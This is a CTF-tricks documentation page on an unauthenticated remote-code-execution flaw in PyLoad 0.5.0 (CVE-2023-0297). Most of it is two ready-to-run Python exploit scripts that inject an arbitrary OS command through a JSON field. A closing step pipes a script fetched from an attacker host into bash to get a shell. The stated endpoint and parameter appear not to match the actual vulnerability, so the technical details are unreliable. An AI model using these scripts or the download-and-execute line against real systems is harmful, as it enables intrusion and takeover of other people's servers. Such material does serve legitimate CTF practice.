> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/web/privilege-escalation-web-rce.md).

# Rce

## PyLoad 0.5.0 Unauthenticated RCE (CVE-2023-0297)

Exploiting PyLoad 0.5.0's unauthenticated RCE vulnerability (CVE-2023-0297) typically involves using a specific exploit script. This script leverages the vulnerability to allow for command injection on the target system.

The vulnerability resides in the `check` function within the `AccountManager` component, accessible via the `/api/check_account` endpoint. This function improperly handles the `krypt_key` parameter, allowing an attacker to inject arbitrary commands.

A Python script targeting this vulnerability might look like this:

```python
import requests
import sys
import json

def exploit(url, command):
    payload = {
        'krypt_key': f"'; import os; os.system('{command}') #",
        'hmac': 'test',
        'account': 'test',
        'folder': 'test'
    }
    try:
        response = requests.post(f"{url}/api/check_account", json=payload)
        if response.status_code == 200:
            print(f"Exploit sent. Response status code: {response.status_code}")
            print("Check the target for command execution.")
        else:
            print(f"Exploit failed. Received status code: {response.status_code}")
            print(f"Response body: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"Error connecting to {url}: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <command_to_execute>")
        print("Example: python {sys.argv[0]} http://192.168.1.100 'id'")
        sys.exit(1)

    target_url = sys.argv[1]
    command = sys.argv[2]
    exploit(target_url, command)
```

This script constructs a malicious `krypt_key` payload that breaks out of the intended string context using a single quote (`'`), injects Python code (`import os; os.system('{command}')`) to execute a system command via the `os.system()` function, and then comments out the rest of the original string using a hash (`#`). The payload is then sent in a JSON request to the vulnerable `/api/check_account` endpoint.

Another example of a Python exploit script for this vulnerability involves crafting a similar JSON payload and sending it via a POST request. This script demonstrates the core logic of sending the crafted payload to trigger the command injection:

```python
import requests
import sys

def exploit(target, cmd):
    url = f"{target}/api/check_account"
    payload = {
        "krypt_key": f"'; import os; os.system('{cmd}') #",
        "hmac": "test",
        "account": "test",
        "folder": "test"
    }
    try:
        response = requests.post(url, json=payload)
        print(f"Status Code: {response.status_code}")
        print(f"Response Body: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <command>")
        print(f"Example: python {sys.argv[0]} http://192.168.1.100 'whoami'")
        sys.exit(1)
    
    target_url = sys.argv[1]
    command_to_execute = sys.argv[2]
    exploit(target_url, command_to_execute)
```

To gain a shell or execute further actions, the injected command is often used to download a payload script (such as a bash reverse shell) from an attacker-controlled HTTP server and execute it directly. A common command structure used in the injection is:

```bash
curl http://<attacker_ip_or_url>/<payload.sh> | bash
```

Where `<payload.sh>` on the attacker's machine contains the desired shell or commands. Successful exploitation via this method in CTFs often grants high-privileged access, frequently leading directly to a root shell. This technique leverages `curl` to fetch the script content and pipe it directly to the `bash` interpreter for execution without saving it to disk first.
